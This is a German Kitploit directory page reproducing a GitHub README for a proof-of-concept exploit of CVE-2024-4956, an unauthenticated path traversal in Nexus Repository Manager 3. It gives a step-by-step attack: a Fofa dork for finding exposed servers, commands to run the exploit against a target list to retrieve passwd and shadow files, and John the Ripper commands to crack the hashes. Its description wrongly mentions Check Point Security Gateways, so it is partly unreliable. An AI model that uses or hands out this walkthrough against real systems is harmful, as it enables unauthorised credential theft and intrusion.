Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-4956 — POC - CVE-2024–4956 - Nexus Repository Manager 3 Nicht authentifizierte Pfad-Traversierung | Kitploit
Tools/GitHubGitHub/verylazytech/cve-2024-4956
Passwort-CrackingAufklärungSchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffung
GitHubverylazytech/cve-2024-4956

CVE-2024-4956

POC - CVE-2024–4956 - Nexus Repository Manager 3 Nicht authentifizierte Pfad-Traversierung

Repository anzeigen
164vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Webseite

CVE-2024-4956

My Shop Medium Github Buy Me A Coffee

POC - CVE-2024–4956 - Nexus Repository Manager 3 Nicht authentifizierte Path Traversal

Ermöglicht es einem Angreifer potenziell, bestimmte Informationen auf Check Point Security Gateways zu lesen, sobald diese mit dem Internet verbunden und mit Remote Access VPN oder Mobile Access Software Blades aktiviert sind. Ein Sicherheitsupdate, das diese Schwachstelle entschärft, ist verfügbar.

Mehr dazu lesen — CVE-2024-4956

Haftungsausschluss: Dieses Proof of Concept (POC) dient ausschließlich zu Bildungs- und ethischen Testzwecken. Die Verwendung dieses Tools zum Angriff auf Ziele ohne vorherige gegenseitige Zustimmung ist illegal. Es liegt in der Verantwortung des Endbenutzers, alle geltenden lokalen, staatlichen und bundesrechtlichen Gesetze einzuhalten. Die Entwickler übernehmen keine Haftung und sind nicht für Missbrauch oder Schäden verantwortlich, die durch dieses Programm verursacht werden.

Erste Schritte

Ziele finden

Um potenzielle Ziele zu finden, verwende Fofa (ähnlich wie Shodan.io):

  • Fofa Dork: header="Server: Nexus/3.53.0-01 (OSS)"

Alt text

Zuerst das Repository klonen:

root@kitploit:~
git clone https://github.com/verylazytech/CVE-2024-4956

Als Nächstes wähle dein Ziel und füge es im folgenden Format zur Datei list.txt hinzu:

  • https://ip_address

Führe den Exploit aus:

root@kitploit:~
python3 CVE-2024-4956.py -l list.txt

Die Ausgabe sind die gefundenen passwd- und shadow-Dateien:

Alt text

Nachdem du nun sowohl die Dateien passwd als auch shadow gefunden hast, kannst du versuchen, den Hash mit JohnTheRipper zu knacken. Nach dem Ausführen des Exploits hast du 2 Dateien, passwd und shadow. Du kannst sie also in einer Datei zusammenführen und versuchen, sie zu knacken (ich habe rockyou.txt verwendet, aber es kann jede Passwort-Wortliste sein):

root@kitploit:~
unshadow passwd shadow > unshadowed.txt 
root@kitploit:~
john --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt
Tool herunterladen